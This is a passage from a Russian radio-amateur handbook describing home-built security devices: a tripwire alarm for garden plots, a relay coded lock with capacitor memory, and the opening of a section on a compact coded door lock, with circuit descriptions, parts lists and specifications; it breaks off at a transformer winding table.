Для решения этой проблемы все приведенные в справочнике электронные устройства достаточно надежны и долговечны, но сложны в изготовлении и эксплуатации. Рассматриваемые ниже электронные и релейные автоматы позволяют создавать системы, защищающие сады и огороды, так как могут быть установлены не только по периметрам участков, но и локально в одном или нескольких наиболее уязвимых местах. Например, вокруг плодовых деревьев (яблонь, груш, слив), грядок с клубникой, около кустов черной смородины и т. д. В этом случае в качестве основного охранного элемента схемы используется шлейф, изготавливаемый из тонкого обмоточного провода, который при обрыве дает сигнал на электронный блок охранного устройства.
Принципиальная электрическая схема электронного охранного устройства для охраны садов и огородов, собранного на ППП, приведена на рис. 2. 16. Схема включает в свой состав сетевой понижающий трансформатор питания Т1 унифицированной конструкции, выпрямительное устройство, стабилизатор напряжения регулируемого типа, триггер Шмитта, входные и выходные цени и шлейф. В конструкции охранного устройства можно выделить также самостоятельные сборочные единицы: БП, БЭ и устройство сигнализации.
Блок питания представляет собой законченную конструкцию, функции которой в радиолюбительской практике могут быть значительно расширены за счет его универсального выходного стабилизированного напряжения 12 В. Но следует заметить, что выходное напряжение можно регулировать переменным резистором R5 в достаточно широких пределах. БП можно использовать для электропитания различной радиолюбительской аппаратуры, радиоэлектронных устройств и приборов промышленного изготовления.
На входе устройства собран емкостный фильтр на конденсаторах С1 и С2, которые защищают устройство от низкочастотных помех, проникающих в сеть электропитания переменного тока. Конденсаторы фильтра соединены последовательно, с заземлением средней точки. Здесь же на входе установлен плавкий предохранитель F1, защищающий входные цепи устройства от перегрузок и коротких замыканий, которые могут возникнуть при ошибках в монтаже, при сборке из непроверенных комплектующих элементов, из-за случайных замыканий в токопроводящих частях. Плавкий предохранитель рассчитан на максимальный ток до 1 А. В номинальном режиме работы используется предохранитель на ток срабатывания 0, 5 А.
Неоновая лампочка HI тлеющего разряда сигнализирует о подаче переменного напряжения на сетевой трансформатор после включения питания переключателем S1. Гасящее сопротивление резистора R1 обеспечивает равномерное свечение лампы H1 и предохраняет от бросков напряжения.
В сторожевом устройстве применен сетевой унифицированный трансформатор питания Т1 серии ТН. Трансформатор имеет пять обмоток: две первичные и три вторичные. Первичные обмотки рассчитаны на подключение к сети переменного тока напряжением 110, 127, 220 и 237 В частотой 50 Гц. На рис. 2. 14 показано включение первичных обмоток на напряжение 220 В. Для включения трансформатора в сеть переменного напряжения 127 В необходимо соединить выводы 1 и 4, 3 и 6, а напряжение подать на выводы 1 и 3 или 4 и 6.
Сетевой трансформатор питания необходим не только для трансформации напряжения до низких значений, но и для полной гальванической развязки первичной сети высокого напряжения переменного тока от вторичных цепей БЭ,а это значительно повышает электробезопасность эксплуатации и позволяет производить наладочные работы при включенном в сеть устройистве. Конечно, при этом должны строго соблюдаться все меры предосторожности и выполняться все правила безопасности. Вместо покупного трансформатора в сторожевом устройстве можно применить самодельный трансформатор, собранный в домашней мастерской. Такой трансформатор изготавливается на броневом или стержневом магнитопроводе типа Ш или ШЛ и реже ПЛ.
Самодельный трансформатор питания можно выполнить по данным, приведенным в табл. 2.16. При этом можно изготовить простой двухобмоточный трансформа тор с одной первичной и одной вторичной обмотками Первичная обмотка рассчитана на подключение к сети переменного тока напряжением 220 В, а на вторичной обмотке в этом случае действует переменное напряжение 15 В при холостом ходе.
Таблица 2.16. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электронном стороже для приусадебного участка
Примечание: вместо самодельного трансформатора могут быть использованы унифицированные трансформаторы типов ТН4-127/220-50,ТНЗ 1-127/220-50, ТН34-127/220-50. ТПП-127/220-50, ТПП224-127/220-50.
Особое внимание при изготовлении самодельного трансформатора необходимо обратить на повышение со противления изоляции не только обмоточных проводов, но и на сопротивление изоляции между витками, обмотками и рядами. Как правило, при изготовлении трансформаторов используется рядовая укладка проводов, и крайне редко — универсальная, поэтому необходимо изолировать друг от друга каждый ряд обмоточного провода. Хорошие результаты можно получить при пропитке катушки трансформатора изоляционными лаками.
Между обмотками трансформатора укладывается один ряд обмоточного провода, один конец которого заземляется на магнитопровод. При укладке этого ряда, являющегося экраном, необходимо усилить изоляцию между обмотками.
На выводах унифицированного трансформатора в режиме номинальной нагрузки действует переменное напряжение: 6,3 В (выводы 7 и 8, обмотка II), 5/6,3 В (выводы 9, 10 и 11, обмотка ///), 6,3 В (выводы 12, 13 и 14, обмотка IV). Для получения на выходе трансформатора переменного напряжения 16,3В выводы обмоток соединены между собой последовательно, с соблюдением правила намотки. Начала намотки на схеме обозначены точками.
На выходе трансформаторных обмоток собрано выпрямительное устройство, выполненное на четырех диодах и двух оксидных конденсаторах. Выпрямитель выполнен по однофазной двухполупериодной мостовой схеме на диодах VD1—VD4 и имеет как положительные, так и негативные свойства. К положительным относятся: повышенная частота пульсации выпрямленного напряжения постоянного тока, пониженные значения обратного напряжения на выпрямительных диодах, хорошее использование габаритной мощности сетевого трансформатора питания Т1. К негативным: более высокие потери, пониженный кпд, невозможность установки диодов на металлическом радиаторе охлаждения без изоляционных прокладок, повышенная стоимость изготовления и повышенный расход выпрямительных диодов.
Работает выпрямитель на емкостную нагрузку, составленную из электролитических конденсаторов большой емкости С1 и С2.
Выпрямленное напряжение постоянного тока подается на стабилизатор напряжения, собранный на транзисторах VT1, VT2 и стабилитроне VD5. Стабилизированное напряжение 12 В устанавливается подстроечным резистором R5. Стабилизатор напряжения состоит из РЭ па транзисторе VT1, УПТ на транзисторе VT2, источника опорного напряжения на стабилитроне VD5, резисторов R2—R6, обеспечивающих режимы работы транзисторов, и выходного электролитического конденсатора С4. Следует заметить, что УПТ в стабилизаторе может питаться от дополнительного источника (например, ПСН).
Стабилизированное напряжение питания подается на БЭ сторожевого устройства в точках А и Б. В этих точках действует напряжение постоянного тока 12В. Если домашний мастер захочет сдублировать электропитание или подключить резервный источник в виде ХИТ, то конструктивно точки А и Б необходимо выполнить как приборные разъемные соединения.
Универсальное напряжение постоянного тока 12В позволяет питать сторожевое устройство от бортовой сети автомобиля, и применение его в этом случае может стать надежным дублирующим устройством для охраны любого транспортного средства. Вместо светового индикатора можно легко приспособить любой другой ИМ, срабатывающий при напряжении 12В и потребляющий ток нагрузки до 1 А.
Электронный блок сторожевого устройства представляет собой триггер Шмитта, вход которого соединен со шлейфом с помощью электрических соединителей Х2 и ХЗ. В соответствии с классификацией электронных устройств триггер является переключающим устройством, которое может любое время сохранять одно из двух своих состояний устойчивого равновесия и скачкообразно переключается по электрическому сигналу из одного состояния в другое.
Электронный блок собран на четырех транзисторах, одном диоде, одном конденсаторе С5 и резисторах, обеспечивающих необходимые режимы работы этих транзисторов как в режиме ожидания, так и в режиме подачи тревожных сигналов. Шлейф, прокладываемый по периметру охраняемой территории, изготавливается из тонкого обмоточного провода с медной жилой диаметром до 0,15 мм. Можно применить провод марки ПЭЛ, ПЭВ-1, ПЭВ-2. Срабатывает устройство при обрыве провода шлейфа, при этом транзистор VT6 открывается.
В исходном состоянии транзисторы БЭ закрыты и сигнальная лампа Н2 не светится. После открывания транзистора VT6 импульс тока переключает триггер Шмитта в состояние, при котором открывается транзистор VT3 и лампа Н2 загорается.
При изготовлении стороженого устройства для приусадебного участка использованы следующие комплектующие покупные ЭРИ и ЭРЭ: транзисторы V'T1 типа П213Б, VT2 МП37Б, VT3 - П217А, VT4 МП37, VT5 - MП37, VT6 МП37;
выпрямительные диоды VD1—VD4 типа КД202Р, VD6 - Д220;
стабилитрон VD5 типа Д814А; конденсаторы С1 типа МБМ-11-750В-0,01 мкФ, С2 - МБМ-II-750В-0,01мкФ, C3 К50-6-25В-1000 мкФ, С4 К50-6-16В-1000 мкФ, С:5 К50-6-16В-68 мкФ; резисторы R1 типа МЛТ-0,5-200 кОм, R2 МЛТ-0,5-4 7 кОм, R3— МЛТ-0,5-360Ом, R4 — МЛТ-0,5-390 Ом, R5 СП4-2Ма-0,5Вт-1,5 кОм, R6 — МЛТ-0,5-120 Ом, R7 -МЛТ 05-510 Ом, R8 — МЛТ-0,5-200 Ом, R9 — МЛТ 1 2,2 кОм, R10 — МЛТ-0,5-7,5 кОм, R11 — МЛТ-0,5-910 Ом, R12 — МЛТ-0,5-120 Ом, R13 — МЛТ-0,5-15 кОм, R14 — МЛТ-0,5-6,8 кОм, R15 — МЛТ-0,5-6,8 кОм, R16 — МЛТ-1-13 кОм, R17 — МЛТ-1-10 кОм; индикаторные лампы H1 типа ТН-0,2-1, Н2 — МН-12В-0.5А; электрические соединители X1 типа «вилка» с электрическим кабелем длиной 1,5 м и с двойной изоляцией;
Х2, ХЗ типа КМЗ-1 приборные; переключатель однополюсный S1 типа П1Т-1-1; плавкий предохранитель F1 типа ПМ-1-1 А;
контакты приборные А и Б для подключения автономного источника питания.
При настройке, регулировке и ремонте сторожевого устройства можно применить другие комплектующие элементы, предварительно проверенные на соответствие требованиям ТУ. Вместо резисторов типа МЛТ можно применять резисторы типов ВС, ВСа, МТ, ОМЛТ, УЛИ, БП, С2-14, БЛП, БЛПа, С2-10 и другие, конденсаторы типа К50-6 можно заменить на конденсаторы типов К50-3, К50-12, К.50-16, К.50-20 и другие, выпрямительные диоды типа КД202Р — на диоды типов меньшей мощности, например КД226Г, КД205А, Д237В; стабилитрон типа Д814А — на Д814Б, Д815Г, КС156А. Транзисторы, указанные на схеме, могут быть заменены в соответствии с рекомендациями, которые приведены в первой главе справочника.
Основные электрические параметры и технические характеристики электронного сторожа для садово-огородного участка
Номинальное напряжение питающей сети неременного тока, В ....................... 220 или 127
Номинальная частота питающей сети неременного тока, Гц .......................... 50
Номинальное напряжение автономного источника
электропитания постоянного тока, В ......... 12
Стабилизированное напряжение постоянною тока на выходе БП и контрольных гочках А и Б, В, не более ................... . ..... 12
Коэффициент нелинейных искажений питающей
сети переменного тока, %, не более ....... 12
Коэффициент стабилизации, не менее . . ..... 150
Пределы изменения напряжения питающей сети
переменного тока, В ................. 187...242 или
110...140
Пределы изменения частоты питающей сети неременною тока, Гц ..................... 49,5...50,5
Пределы изменения напряжения автономною источника питания, при которых сохраняется работоспособность устройства без срывов, В .... 9...14
Напряжение на входе выпрямительного устройства
в режиме холостого хода, В ............... 16,3
Количество одновременно охраняемых объектов, шт . 1
Время срабатывания устройства при обрыве провода шлейфа, мс, не более ................ 10
Максимально потребляемый ток, А ........... 1
Номинальный ток нагрузки в режиме холостого хода, мА, не более ..................... 45
Переменная составляющая (пульсации) напряжения на выходе в точках А и Б, Вэфф, не более . . 0,14
Изменение напряжения на выходе стабилизатора при изменении напряжения сети от 187 до 242 В, В, не более .......................... 0,6
Срок службы, ч, не менее ................. 5000
Вероятность безотказной работы устройства при
риске заказчика в=0,95, не менее ......... 0,99
Сопротивление изоляции токоведущих проводников относительно корпуса БП, МОм, не менее ..... 20
Сопротивление проводника шлейфа, кОм, не более . 10
кпд, %, не менее ....................... 90
Условия эксплуатации:
температура окружающей среды, °С ....... —25...+45
относительная влажность воздуха при температуре 22 °С, %, не менее ............... 95
атмосферное давление воздуха, мм рт. ст. ..... 100...1000
Рис. 2.16. Принципиальная схема электронного сторожа для садово-огородного участка.
2. 14. ЭЛЕКТРОННО-РЕЛЕЙНОЕ СТОРОЖЕВОЕ УСТРОЙСТВО С ЕМКОСТНОЙ ПАМЯТЬЮ
Настоящее устройство относится к группе сторожевых устройств, основу которых составляют электромеханические или электронные контакты, управляющие электромагнитными ИМ и образующие единую сторожевую систему. В этих системах управляющее напряжение подается, как правило, лишь при условии замыкания определенных контактов и в строго определенной последовательности. Включение электромагнита в таких устройствах приводит к перемещению его сердечника и стопора, связанного с механическим замком, после чего можно открывать замок обычным ключом или автоматически. Рассматриваемое сторожевое устройство предназначено для охраны стационарных объектов и в первую очередь жилых и производственных помещений: квартир, офисов, хозяйственных построек, складов, гаражей и т. д.
Изменяя вид ИМ, можно значительно расширить применяемость данного устройства, при этом само устройство принципиально сохраняется в неизменном виде. Например, можно в качестве ИМ использовать устройства звуковой или световой сигнализации, можно применить дополнительные блокировки при ошибках, допущенных при наборе шифра. Но в данном случае рассматривается очень простой вариант срабатывания ИМ при наборе трех цифр кода.
Принципиальная электрическая схема электронно-релейного сторожевого устройства с емкостной памятью приведена на рис. 2. 17. Работает устройство от сети переменного тока напряжением 220 В частотой 50 Гц через понижающий трансформатор. Электропитание основной схемы и исполнительных механизмов осуществляется стабилизированным напряжением 24 В постоянного тока. Электропитание сторожевого устройства от автономного вторичного источника питания не предусмотрено.
При конструировании данного сторожевого устройства рекомендуется выполнить его в виде самостоятельных функциональных узлов, связь между которыми должна осуществляться с помощью электрического монтажа. Для обеспечения этого условия в конструкциях отдельных блоков необходимо предусмотреть необходимое количество быстроразъемных соединений и приборных контактов, которые имеют минимальное переходное сопротивление. Условно всё устройство можно выполнить в виде трех блоков — самостоятельных сборочных единиц: БП, БЭ, блока исполнительных механизмов.
Достаточно трудоемкой для изготовления частью электронного сторожевого устройства является БП, выполненный на ППП. Схемно-техническое решение БП является традиционным, не включает в себя сложных
элементов и поэтому вполне доступно для повторения начинающими радиолюбителями. Изготовленный в домашней мастерской данный БП значительно расширяет возможности радиолюбительской лаборатории, дает возможность приобрести дополнительный опыт конструирования РЭУ с системой защиты и использовать данный БП в практических целях, так как он имеет высокие технические характеристики и безопасен при эксплуатации. Защитное устройство в БП позволяет также избежать порчи остродефицитных и дорогостоящих ЭРИ и ЭРЭ при перегрузках и коротких замыканиях. БП включает в свой состав входные цепи, сетевой понижающий трансформатор питания Т1, выпрямитель, емкостный фильтр, стабилизатор напряжения постоянного тока, защитное устройство с ограничением выходного тока при перегрузке и с контролем уровня выходного напряжения. Отличительной особенностью примененного защитного устройства является то, что оно срабатывает как при повышении, так и при понижении напряжения на нагрузке.
Защитный узел БП может быть использован в других ЭРИ в составе различных типов стабилизаторов, так как он проверен при эксплуатации и всегда дает положительный результат.
Блок питания выполнен на шести транзисторах VT1— VT6. Подключение БП к сети переменного тока осуществляется с помощью электрического соединителя X1 типа «вилка». Два плавких предохранителя F1 и F2 рассчитаны на ток срабатывания 0,5 А при полной нагрузке, защищают входные цепи и устройство от коротких замыканий при ошибках в монтаже. Установленные на входе БП два конденсатора С1 и С2 параллельно первичной обмотке трансформатора Т1 защищают устройство от низкочастотных помех, проникающих в сеть питания переменного тока. Включение и выключение электропитания обеспечивается однополюсным переключателем S1.
В БП использован самодельный сетевой понижающий трансформатор питания Т1, изготовленный на броневом магнитопроводе типа Ш или ШЛ. Активная площадь поперечного сечения стали основного стержня магнитопровода должна быть не менее 6,5 см^2. Выполнение этого условия обеспечивается шихтованным магнитопроводом типоразмера Ш25Х25. Можно применить магнитопровод ШЛ25Х32, ШЛМ25Х25, УШ20Х30. Сетевой трансформатор обеспечивает на выходе 33 В переменного напряжения в режиме холостого хода, заданное выпрямленное напряжение постоянного тока, а также полную гальваническую развязку между первичной и вторичными цепями устройства. Для намотки первичной обмотки трансформатора применен провод марки ПЭВ-1 диаметром 0,31 мм и провод марки ПЭВ-2 диаметром 0,76 мм для вторичной обмотки. Первичная обмотка содержит 1210 витков, вторичная — 182 витка.
При изготовлении сетевого трансформатора необходимо точно соблюдать технологические приемы для того, чтобы обеспечить заданные электрические параметры. Основные рекомендации по изготовлению и изоляции трансформаторов рассмотрены выше.
Сетевой понижающий трансформатор питания должен обеспечивать следующие электрические параметры и технические характеристики на протяжении всего периода эксплуатации:
Рабочий диапазон частот, Гц ................ 30...200
Номинальная мощность, Вт ................. 50
Резонансная частота, Гц, нс менее ............ 1000
Максимальное значение испытательного напряжения, В ............................ 500
Коэффициент нелинейных искажений на граничных частотах рабочего диапазона, %, не более . . 5
Коэффициент амплитудно-частотных искажении в
рабочем диапазоне частот, дБ ............. ±2
Максимальная амплитуда переменного входного
напряжения, В ........................ 280
Предельное отклонение сопротивления постоянному току, %, не более .................. ± 15
Максимальное напряжение на первичной обмотке
трансформатора, В ..................... 440
Сопротивление нагрузки трансформатора, кОм .... 0,01...20
Максимальное постоянное напряжение на обмотках трансформатора по отношению к шасси сторожевого устройства, В ................ 300
Коэффициент трансформации ................ 6,65
Сопротивление изоляции между обмотками, а также между каждой обмоткой и магнитопроводом, МОм, не менее ................ 20
Максимальное отклонение коэффициента трансформации, %, не более .................. ±5
Номинальное выходное напряжение переменного
тока на вторичной обмотке, В .............. 33
Выпрямитель сторожевого устройства собран по традиционной однофазной двухполупериодной мостовой схеме на четырех диодах VD1-VD4 средней мощности. Выпрямитель работает на емкостную нагрузку на оксидном конденсаторе С3. На выходе выпрямителя под нагрузкой действует постоянное напряжение 25 В, которое подается наi стабилизатор напряжения, собранный на транзисторах VT2—VT4.
Стабилизатор напряжения компенсационного типа обеспечивает необходимую стабильность. напряжения на нагрузке при помощи отрицательной обратной связи, воздействующей на РЭ. В состав компенсационного стабилизатора последовательного типа входят следующие основные функциональные узлы: РЭ, устройство сравнения и УПТ. Регулирующий элемент выполнен на составном транзисторе VT2, VT3. Схема стабилизатора собрана по классическому варианту, и в данном случае оригинальным решением является защитное устройство.
Защитное устройство, собранное на транзисторах VT1, VT5, VT6, работает следующим образом. При уменьшении выходного напряжения до 21 В или при увеличении выходного напряжения до 27 В при номинальном напряжении 24 В защитное устройство срабатывает, обесточивая стабилизатор напряжения. Основным ИМ защитного устройства является электромагнитное реле К1. При перегрузке или коротком замыкании, когда стабилизатор входит в аварийный режим, напряжение на нагрузке резко уменьшается и при его суммарном значении на стабилитронах VD10 и VD11 становится ниже действующего на них, транзистор VT5 закрывается. Начинает заряжаться конденсатор С5, и при определенном значении напряжения открывается транзистор VT1, срабатывает электромагнитное реле К1 и самоблокируется контактами К1.1. В это же время параллельно включенные контакты реле К1.2 и К1.3 размыкаются, обесточивая стабилизатор напряжения.
При повышении напряжения на нагрузке, которое вызовет также аварийный режим работы и будет выше напряжения стабилизации цепи стабилитронов VD12, VD13, откроется транзистор VT6, что в свою очередь приведет к закрыванию транзистора VT5 и отключению стабилизатора от выпрямителя так же, как и при понижении напряжения на нагрузке.
Конденсатор С1 играет роль буфера, который при первом включении еще не зарядился, тем самым он обеспечивает необходимую задержку включения. Этот конденсатор выполняет еще одну функцию — помехозащитною фильтра. Но основное время задержки срабатывания зависит от параметров электромагнитного реле К1. Максимальное время задержки составляет ориентировочно 20 мс.
Основными элементами сторожевого устройства и БЭ являются конденсаторы С8, С9 и С10, емкость которых рассчитана на определенное напряжение срабатывания электромагнитного реле КЗ, транзистор V'T7, выпрямительные диоды VD15-VD18, электромагнит ЭМ1 и детали коммутационные.
Шифровальный узел устройства включает в себя набор электрических соединителей Х2—Х25, перемычки, устанавливаемые между этими соединителями, и переключатели S2—S7. Конструктивно шифровальный узел рекомендуется расположить на лицевой плате БЭ. В данном случае удобно рассмотреть работу устройства при кодировании трехзначного числа.
Всегда первая цифра кода соответствует номеру кнопки первого переключателя S2, подключенной к гнездам Х2 и Х4, вторая цифра — номеру кнопки, подключенной к гнездам соединителей Х6 и Х8, третья — номеру кнопки, подключенной к гнездам соединителей Х10 и Х12. Для того чтобы сработало устройство охраны, кнопки должны быть нажаты в порядке установленного шифра. Кнопки переключателей S5—S7 являются некодовыми, и в случае нажатия любой из них устройство не сработает. В данном случае установлен шифр 123.
Для установления другого шифра необходимо сделать перетрассировку перемычек, соединяющих их. Например, если потребуется установить шифр 624, необходимо Х22 соединить с ХЗ, Х24 с Х5; Х6 с Х7, Х8 с Х9;
Х14 с X11, Х16 с Х13. Остальные пары соединителей можно устанавливать в любом порядке. Например, Х2 с Х15, Х4 с Х17, Х10 с Х19, Х12 с Х21; Х18 с Х23, Х20 с Х25.
Таким образом, цифры, указанные над переключателями S2—S7, являются цифрами будущего шифра, а цифры, стоящие в кавычках (также с 1 до б), указывают на порядок счета при нажатии кнопок. Любая верхняя на схеме цифра кода — с 1 до 6 — имеет только ей принадлежащую пару контактных соединителей. Поэтому при изготовлении кодировочного узла очень удобно объединять эти пары и включать одновременно в гнезда, устанавливающие порядок счета. Так, цифре кода, обозначенной 1, соответствуют контакты соединителей Х2 и Х4, цифре 2 — контакты Х6 и Х8 и т. д. Соединять пары контактов Х2 и Х4, Х6 и Х8 и т. д. можно с любыми парами контактов дешифратора. Заметим еще раз, что контакты соединителей ХЗ и Х5 обозначены цифрой 1, контакты Х7 и Х9 — цифрой 2, X11 и Х13 — цифрой 3, Х15 и Х17 — цифрой 4, Х19 и Х21 — цифрой 5 и Х23 и Х25 — цифрой 6. Цифры дают только порядок считывания зашифрованного кода, который не изменяется в данной схеме.
При нажатии первой кнопки S2 конденсатор С8 начинает заряжаться напряжением, которое снимается с резистора R13 (по расчету — до 85% его номинального значения). Срабатывает первая цифра кода. При нажатии на вторую кнопку переключателя S3 до такого же напряжения начинает заряжаться конденсатор С9; при нажатии третьей кнопки S4 конденсатор С10 заряжается до полного напряжения, действующего на резисторе R13. Таким образом, суммарное напряжение на конденсаторах С8—С10 после набора правильного шифра 123 будет составлять только 27% напряжения, снимаемого с резистора R13 и достаточного для срабатывания электромагнитного реле КЗ. При правильном нажатии лишь двух кнопок шифра напряжение на конденсаторах С8— С10 окажется недостаточным для срабатывания этого реле. В случае нажатия любой другой кнопки переключателей S5—S7 конденсаторы тут же разрядятся через диоды VD15—VD18 и сторожевое устройство вернется в исходное состояние.
После правильного набора шифра необходимо нажать кнопку переключателя S8. При этом на базу транзистора VT7 будет подано напряжение отрицательной полярности, транзистор VT7 откроется и сработает электромагнитное реле КЗ. Контакты этого реле КЗ.3 включат электромагнит, который своим сердечником связан с механическим замком, и он откроется. Одновременно контакты КЗ.2 подключат резистор R12 к базе транзистора, а через контакты реле КЗ.1, резистор R13 и диоды VD15—VD17 конденсаторы С8—С10 разрядятся. При отпускании кнопки переключателя S8 база транзистора VT7 вновь соединится с плюсом источника питания, транзистор закроется и устройство возвратится в исходное состояние. При изготовлении сторожевого устройства использованы следующие покупные и самодельные комплектующие ЭРИ и ЭРЭ: транзисторы VT1 типа КТ203А, VT2 — КТ803А, VT3 — КТ81В, VT4 — КТ814В, VT5 — КТ203Б, VT6 — КТ203Б, VT7 — П214; конденсаторы С1 типа МБМ-11-750В-0,01 мкФ, С2-МБМ-11-750В-0.01 мкФ, СЗ — К50-6-50В 50 мкФ, С4 — K50-6-50В-4000мкФ, С5-К73-17-63В-1мкФ С6-К-10-17-50В-П33-100нФ, С7 — К53-1А-30В-б,8 мкФ, С8-К50-3-15В-10 мкФ, С9 — K50-3-15B-68 мкФ, С10 - К50-3-15В-400 мкФ;
резисторы R1-типа ВСа-0,5-330Ом, R2-ВСа-0,25-110 Ом R3-ВСа-0,25-680 Ом, R4 — ВСа-0,5-10 кОм, R5 - ВСа-0,5-2,7 кОм, R6 — ВСа-0,25-15 кОм, R7 — ВСа-0,25-10 кОм, R8 — ВСа-0,25-2,7 кОм, R9 — ВСа-0,25-2,7 кОм, R10 — ВСа-0,25-10 кОм, R11 — ВСа-0,25-2,7 кОм, R12 — ВСа-2-390 Ом, R13 — ВСа-0,5 160 Ом; выпрямительные диоды VD1—VD4 типа Д242Б, VD5 — КД522Б, VD15 — Д220, VD 16 — Д220, VD17 - Д220, VD18 — Д220; стабилитроны VD6 типа Д818А, VD7 - Д818А, VD8 — Д818А, VD9 — Д818А, VD10 — Д814Г VD11 — Д814Г, VD12 — Д814Д, VDI3 — Д814Д, VD14 — Д818А; электрические соединители X1 типа «вилка» с электрическим кабелем длиной 1,5 м, Х2—Х25 типа КМЗ-1 или сдвоенные контактные пары соединителей; плавкие предохранители F1 и F2 типа ПМ-1-1,5 А; переключатели S1 типа П1Т-1-1, S2-S7 - КМ1-1, S8 - КМ1-1; электромагнитные реле К1 типа РЭС-22 (паспорт РФ4.500.122), К2 — РЭС-6 или электромагнит самодельной конструкции, КЗ — РЭС-22 (паспорт РФ4.500.163); сетевой понижающий трансформатор питания Т1 броневой конструкции типа Ш (УШ, ШЛ).
При изготовлении, регулировке и ремонте сторожевого устройства могут быть использованы другие комплектующие ЭРЭ. Например, вместо резисторов типа ВСа можно применить резисторы типов МЛТ, ОМЛТ, МТ, С 1-4, С2-8 и другие, можно применить оксидные конденсаторы типов К50-6, К50-12, К50-16, К50-20. Вместо реле типа РЭС-22 можно применить реле типа РЭС-6 (паспорт РФО.452.131), вместо транзистора типа КТ803 — КТ819Б, КТ819В, КТ819Г, КТ827А, КТ827Б, транзистор типа КТ815В можно заменить на транзисторы типов КТ815Б, КТ801Б, КТ817Б, а КТ814В — на КТ814Г.
Настройка БП обеспечивается подборкой цепи стабилитронов VD10, VD11 так, чтобы их суммарное напряжение стабилизации было равно 21 В, а цепи VD12, VDI3 — 26,5...27 В. Налаживание БЭ сводится к правильному выбору сопротивления резистора R13, падение напряжения на котором должно обеспечить достаточный заряд конденсаторов С8, С9 и С10.
Основные электрические параметры и технические характеристики электронно-релейного сторожевого устройства с емкостной памятью
Номинальное напряжение читающей сети переменного тока, В....................... 220
Номинальное напряжение стабилизированною
постоянного тока, В................... 24
Номинальная частота питающей сети переменного тока, Гц ......................... 50
Коэффициент нелинейных искажений питающей
сети переменного тока, %, нс более ......... 12
Пределы изменения напряжения питающей сети
переменного тока, В .................... 180...240
Пределы изменения частоты питающей сети неременного тока, % ..................... ±1
Коэффициент стабилизации выпрямленного напряжения постоянного тока, нс менее ........ 300
Суммарное напряжение стабилизации на стабилитронах, В:
VD10—VD11 ......................... 21
VD12—VD13 ......................... 26.5...27
Амплитуда пульсации выходного напряжения при токе нагрузки до 1,5 А, мВ, не более ......... 2
Максимальный ток нагрузки на выходе стабилизатора напряжения, А ................... 4,5
Напряжение срабатывания защитного устройства,
В (нижнее и верхнее значения) ............. 21 и 27
Напряжение питания реле, В ............... 24
Количество одновременно охраняемых объектов ... 1 Время срабатывания сторожевого устройства при правильном наборе шифра, мс, не более ...... 2
Срок службы, ч, не менее .................. 5000
Вероятность безотказной работы устройства при
риске в=0,95, не менее .................. 0,97
Сопротивление изоляции токоведущих проводников монтажа между собой и металлических частей сторожевого устройства, МОм, не менее ....... 20
Помехозащищенность устройства при воздействии
внешнего электромагнитного поля, дБ, не менее . 120 кпд, %, не менее ........................ 80
Условия эксплуатации:
температура окружающей среды, С ......... —25...+45
относительная влажность воздуха при температуре 25 °С, %, не более ............... 92±3
атмосферное давление воздуха, мм рт. ст. ..... 200...900
Рис. 2.17. Принципиальная схема электронно-релейного сторожевого устройства с емкостной памятью.
2.15. МАЛОГАБАРИТНОЕ ОХРАННОЕ УСТРОЙСТВО
С ДИСКРЕТНЫМ УПРАВЛЕНИЕМ
Данное электронное охранное устройство, собранное на ППП и микросхемах, предназначено для установки на входных дверях жилых и производственных помещений и может эксплуатироваться в условиях УХЛ, ХЛ и В. Работает охранное устройство от сети переменного тока напряжением 220 В частотой 50 Гц. При этом электропитание ИМС осуществляется стандартным номинальным напряжением 5 В.
Рассматриваемое охранное устройство может быть использовано также для блокировки открывания обычных врезных и накладных механических замков, устанавливаемых па наружных и внутренних дверях охраняемых объектов бытового и хозяйственною назначения, например на садово-огородных участках. При этом может быть обеспечена дополнительная защита открывания дверей, так как даже при наличии необходимого ключа замок невозможно открыть без знания пятизначного кода. Это достигается незначительной конструктивной доработкой, например врезного механического замка, заключающейся в установке дополнительного стопорного устройства, работающего от маломощного тягового электромагнита или от заменяющего его электромагнитного реле. Эта работа вполне доступна начинающему радиолюбителю в своей лаборатории.
Охранное устройство может быть рекомендовано также для установки на воротах гаражей и складских помещений при эксплуатации в условиях повышенной влажности (до 98%) и при температуре окружающей среды от —35 до 45 °С.
Устройство, принципиальная схема которого изображена на рис. 2.18, характеризуется высокими электрическими параметрами и техническими характеристиками, повышенной надежностью, долговечностью и устойчивостью к внешним механическим нагрузкам, в том числе вибрациям, потребляет малую мощность при работе и имеет сравнительно небольшие размеры. Это обеспечивается достаточно простым схемно-техническим решением и удобным конструктивным исполнением. Технология изготовления устройства определяется возможностями радиолюбителя, оснащением его домашней мастерской.
Комплектующие ЭРИ, входящие в схему охранного устройства, являются неотъемлемой частью системы, в которую дополнительно входят механический замок врезной или накладной конструкции, стопорное устройство защелки, ИМ, который приводится в действие от электромагнита или соленоида. Как следует из схемы, охранное устройство включает в свой состав входные цепи, конденсаторный фильтр, сетевой понижающий трансформатор питания Т1, выпрямитель, работающий на емкостный фильтр стабилизатор напряжения, кодозадающее устройство с дешифратором, ИМ.
Входные цепи обеспечивают подключение охранного устройства к сети переменного тока и защиту его электронной части от проникающих в сеть питания электромагнитных помех. Фильтр собран на двух конденсаторах С1 и С2 со средней точкой, замкнутой на землю. Плавкие предохранители F1 и F2 защищают устройство и его элементы от коротких замыканий и перегрузок, они рассчитаны на максимальный ток срабатывания 2 А. Подключается охранное устройство к питающей сети с помощью стандартного электрического соединителя типа «вилка» X1. После замыкания контактов двухпозиционного переключателя S1 напряжение начинает поступать на первичную обмотку трансформатора и одновременно загорается неоновая индикаторная лампа Н2. Напряжение на исполнительный электромагнит (ЭМ1) не поступает, так как тринистор VS1 находится в закрытом состоянии.
В составе БП устройства использован унифицированный сетевой понижающий трансформатор питания Т1 броневой конструкций типа ТПП. При отсутствии покупного трансформатора радиолюбитель сможет изготовить самодельный трансформатор по данным, приведенным в табл. 2.17. Изготавливается трансформатор на броневом магнитопроводе типа Ш, УШ или ШЛ (ШЛМ), активная площадь поперечного сечения стали которого должна быть не менее 6 см2.
Броневые трансформаторы характеризуются следующими достоинствами: наличием только одной катушки с обмотками по сравнению со стержневыми трансформаторами, более высоким заполнением окна магнитопровода обмоточным проводом, частичной защитой от механических повреждений катушки с обмотками ярмом магнитопровода. Пластинчатые магнитопроводы типа Ш или УШ собираются из отдельных пластин встык или внахлест. При сборке встык все пластины составляются вместе и располагаются одинаково; в этом случае магнитопровод состоит из двух частей, которые соединяют вместе. При сборке встык облегчаются сборка и разборка трансформатора.
Таблица 2. 17. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в малогабаритном охранном устройстве с дискретным управлением
